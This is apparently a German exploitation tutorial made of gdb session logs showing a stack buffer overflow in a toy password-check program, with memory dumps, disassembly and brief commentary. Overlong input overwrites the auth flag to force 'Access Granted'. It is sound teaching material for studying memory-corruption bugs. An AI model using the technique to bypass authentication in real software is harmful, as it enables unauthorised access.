root@toshiba:/home/tomovic/hack# gcc -g -fno-stack-protector -z execstack -o auth_overflow2 auth_overflow2.c
root@toshiba:/home/tomovic/hack# gdb -q ./auth_overflow2
Reading symbols from /home/tomovic/hack/auth_overflow2...done.
(gdb) break 9
Haltepunkt 1 at 0x80484e9: file auth_overflow2.c, line 9.
(gdb) break 16
Haltepunkt 2 at 0x8048537: file auth_overflow2.c, line 16.
(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAA
Starting program: /home/tomovic/hack/auth_overflow2 AAAAAAAAAAAAAAAAAAAAAAAAAAAA
Breakpoint 1, check_authentication (password=0xbffff8d5 'A' <repeats 28 times>)
at auth_overflow2.c:9
9 strcpy(password_buffer, password);
(gdb) x/s password_buffer
0xbffff6bc: "=\203\004\b\344S\374\267\002"
(gdb) x/x &auth_flag
0xbffff6cc: 0x00
(gdb) x/16xw &auth_flag
0xbffff6cc: 0x00000000 0x00000002 0xbffff794 0xbffff6f8
0xbffff6dc: 0x0804857c 0xbffff8d5 0x00000000 0x080485cb
0xbffff6ec: 0xb7fc5000 0x080485c0 0x00000000 0x00000000
0xbffff6fc: 0xb7e2f935 0x00000002 0xbffff794 0xbffff7a0
(gdb) c
Continuing.
Breakpoint 2, check_authentication (password=0xbffff8d5 'A' <repeats 28 times>)
at auth_overflow2.c:16
16 return auth_flag;
(gdb) x/s password_buffer
0xbffff6bc: 'A' <repeats 28 times>
(gdb) x/x &auth_flag
0xbffff6cc: 0x41
(gdb) x/16xw &auth_flag
0xbffff6cc: 0x41414141 0x41414141 0x41414141 0xbffff600
0xbffff6dc: 0x0804857c 0xbffff8d5 0x00000000 0x080485cb
0xbffff6ec: 0xb7fc5000 0x080485c0 0x00000000 0x00000000
0xbffff6fc: 0xb7e2f935 0x00000002 0xbffff794 0xbffff7a0
(gdb) x/xw password_buffer
0xbffff6bc: 0x41414141
(gdb) x/16xw password_buffer
0xbffff6bc: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff6cc: 0x41414141 0x41414141 0x41414141 0xbffff600
0xbffff6dc: 0x0804857c 0xbffff8d5 0x00000000 0x080485cb
0xbffff6ec: 0xb7fc5000 0x080485c0 0x00000000 0x00000000
(gdb) c
Continuing.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Program received signal SIGSEGV, Segmentation fault.
0x0000000a in ?? ()
(gdb) quit
A debugging session is active.
Inferior 1 [process 2597] will be killed.
Quit anyway? (y or n) y
root@toshiba:/home/tomovic/hack#
Leider ist es so, dass das neue OS die Variablen so anordnet, wie es dem Complier passt. Das heisst, dass das heutige OS keine Veränderung bei compilieren vornimmt, der Exploit wird dadurch nicht ausgemerzt. Ihr solltet das Training trotzdem machen, um ein Fingerspitzengefühl für den gdb zu bekommen.
root@toshiba:/home/tomovic/hack# gdb -q ./auth_overflow2
Reading symbols from /home/tomovic/hack/auth_overflow2...done.
(gdb) break 24
Haltepunkt 1 at 0x804856c: file auth_overflow2.c, line 24.
(gdb) break 9
Haltepunkt 2 at 0x80484e9: file auth_overflow2.c, line 9.
(gdb) break 16
Haltepunkt 3 at 0x8048537: file auth_overflow2.c, line 16.
(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Starting program: /home/tomovic/hack/auth_overflow2 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Breakpoint 1, main (argc=2, argv=0xbffff794) at auth_overflow2.c:24
24 if(check_authentication(argv[1])) {
(gdb) i r esp
esp 0xbffff6e0 0xbffff6e0
(gdb) x/32xw $esp
0xbffff6e0: 0xb7fed600 0x00000000 0x080485cb 0xb7fc5000
0xbffff6f0: 0x080485c0 0x00000000 0x00000000 0xb7e2f935
0xbffff700: 0x00000002 0xbffff794 0xbffff7a0 0xb7fff000
0xbffff710: 0x00000084 0x00000000 0xb7fdc858 0x00000003
0xbffff720: 0xbffff790 0xb7fc5000 0x00000000 0x00000000
0xbffff730: 0x00000000 0x2f139079 0x150c7469 0x00000000
0xbffff740: 0x00000000 0x00000000 0x00000002 0x080483e0
0xbffff750: 0x00000000 0xb7ff2990 0xb7e2f849 0xb7fff000
(gdb) c
Continuing.
Breakpoint 2, check_authentication (password=0xbffff8d2 'A' <repeats 30 times>) at auth_overflow2.c:9
9 strcpy(password_buffer, password);
(gdb) i r esp
esp 0xbffff6a0 0xbffff6a0
(gdb) x/32xw $esp
0xbffff6a0: 0xb7e22b98 0xb7fdc858 0xbffff8b0 0xb7fc5000
0xbffff6b0: 0x080485c0 0x080483e0 0x00000000 0x0804833d(2)
0xbffff6c0: 0xb7fc53e4 0x00000002 0x0804a000 0x00000000(1)
0xbffff6d0: 0x00000002 0xbffff794 0xbffff6f8 0x0804857c(3) <-Rückspungadresse
0xbffff6e0: 0xbffff8d2(4) 0x00000000 0x080485cb 0xb7fc5000
0xbffff6f0: 0x080485c0 0x00000000 0x00000000 0xb7e2f935
0xbffff700: 0x00000002 0xbffff794 0xbffff7a0 0xb7fff000
0xbffff710: 0x00000084 0x00000000 0xb7fdc858 0x00000003
(gdb) x/s password_buffer
0xbffff6bc: "=\203\004\b\344S\374\267\002"
(gdb) x/x &auth_flag
0xbffff6cc: 0x00
(gdb)
0xbffff6cd: 0x00
(gdb) x/32xb 0xbffff6bc
0xbffff6bc: 0x3d 0x83 0x04 0x08 0xe4 0x53 0xfc 0xb7
0xbffff6c4: 0x02 0x00 0x00 0x00 0x00 0xa0 0x04 0x08
0xbffff6cc: 0x00 0x00 0x00 0x00 0x02 0x00 0x00 0x00
0xbffff6d4: 0x94 0xf7 0xff 0xbf 0xf8 0xf6 0xff 0xbf
(gdb) x/32xb 0xbffff8d2
0xbffff8d2: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff8da: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff8e2: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff8ea: 0x41 0x41 0x41 0x41 0x41 0x41 0x00 0x54
(gdb) disass main
Dump of assembler code for function main:
0x0804853c <+0>: push %ebp
0x0804853d <+1>: mov %esp,%ebp
0x0804853f <+3>: and $0xfffffff0,%esp
0x08048542 <+6>: sub $0x10,%esp
0x08048545 <+9>: cmpl $0x1,0x8(%ebp)
0x08048549 <+13>: jg 0x804856c <main+48>
0x0804854b <+15>: mov 0xc(%ebp),%eax
0x0804854e <+18>: mov (%eax),%eax
0x08048550 <+20>: mov %eax,0x4(%esp)
0x08048554 <+24>: movl $0x8048661,(%esp)
0x0804855b <+31>: call 0x8048380 <printf@plt>
0x08048560 <+36>: movl $0x0,(%esp)
0x08048567 <+43>: call 0x80483c0 <exit@plt>
0x0804856c <+48>: mov 0xc(%ebp),%eax
0x0804856f <+51>: add $0x4,%eax
0x08048572 <+54>: mov (%eax),%eax
0x08048574 <+56>: mov %eax,(%esp)
0x08048577 <+59>: call 0x80484dc <check_authentication>
0x0804857c <+64>: test %eax,%eax
0x0804857e <+66>: je 0x80485a6 <main+106>
0x08048580 <+68>: movl $0x8048677,(%esp)
0x08048587 <+75>: call 0x80483a0 <puts@plt>
0x0804858c <+80>: movl $0x8048694,(%esp)
0x08048593 <+87>: call 0x80483a0 <puts@plt>
0x08048598 <+92>: movl $0x80486aa,(%esp)
0x0804859f <+99>: call 0x80483a0 <puts@plt>
0x080485a4 <+104>: jmp 0x80485b2 <main+118>
0x080485a6 <+106>: movl $0x80486c6,(%esp)
0x080485ad <+113>: call 0x80483a0 <puts@plt>
0x080485b2 <+118>: leave
0x080485b3 <+119>: ret
End of assembler dump.
(gdb) disass check_authentication
Dump of assembler code for function check_authentication:
0x080484dc <+0>: push %ebp
0x080484dd <+1>: mov %esp,%ebp
0x080484df <+3>: sub $0x38,%esp
0x080484e2 <+6>: movl $0x0,-0xc(%ebp)
=> 0x080484e9 <+13>: mov 0x8(%ebp),%eax
0x080484ec <+16>: mov %eax,0x4(%esp)
0x080484f0 <+20>: lea -0x1c(%ebp),%eax
0x080484f3 <+23>: mov %eax,(%esp)
0x080484f6 <+26>: call 0x8048390 <strcpy@plt>
0x080484fb <+31>: movl $0x8048650,0x4(%esp)
0x08048503 <+39>: lea -0x1c(%ebp),%eax
0x08048506 <+42>: mov %eax,(%esp)
0x08048509 <+45>: call 0x8048370 <strcmp@plt>
0x0804850e <+50>: test %eax,%eax
0x08048510 <+52>: jne 0x8048519 <check_authentication+61>
0x08048512 <+54>: movl $0x1,-0xc(%ebp)
0x08048519 <+61>: movl $0x8048658,0x4(%esp)
0x08048521 <+69>: lea -0x1c(%ebp),%eax
0x08048524 <+72>: mov %eax,(%esp)
0x08048527 <+75>: call 0x8048370 <strcmp@plt>
0x0804852c <+80>: test %eax,%eax
0x0804852e <+82>: jne 0x8048537 <check_authentication+91>
0x08048530 <+84>: movl $0x1,-0xc(%ebp)
0x08048537 <+91>: mov -0xc(%ebp),%eax
0x0804853a <+94>: leave
0x0804853b <+95>: ret
End of assembler dump.
(gdb) p 0x38
$1 = 56
(gdb) p 0x38 +4 +4
$2 = 64
(gdb) c
Continuing.
Breakpoint 3, check_authentication (password=0xbffff8d2 'A' <repeats 30 times>) at auth_overflow2.c:16
16 return auth_flag;
(gdb) x/32xw $esp
0xbffff6a0: 0xbffff6bc 0x08048658 0xbffff8b0 0xb7fc5000
0xbffff6b0: 0x080485c0 0x080483e0 0x00000000 0x41414141
0xbffff6c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff6d0: 0x41414141 0x41414141 0xbf004141 0x0804857c<--Rüclsprungadresse
0xbffff6e0: 0xbffff8d2 0x00000000 0x080485cb 0xb7fc5000
0xbffff6f0: 0x080485c0 0x00000000 0x00000000 0xb7e2f935
0xbffff700: 0x00000002 0xbffff794 0xbffff7a0 0xb7fff000
0xbffff710: 0x00000084 0x00000000 0xb7fdc858 0x00000003
(gdb) c
Continuing.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Program received signal SIGSEGV, Segmentation fault.
main (argc=<Fehler beim Lesen der Variable: Cannot access memory at address 0xbf004149>,
argv=<Fehler beim Lesen der Variable: Cannot access memory at address 0xbf00414d>) at auth_overflow2.c:31
31 }
Es ist wirklich keine Schande, wenn ihr die Adressverwaltung nicht auf Anhieb verstanden habt. Macht erst weiter, wenn Ihr den Expolit 100 % verstanden habt!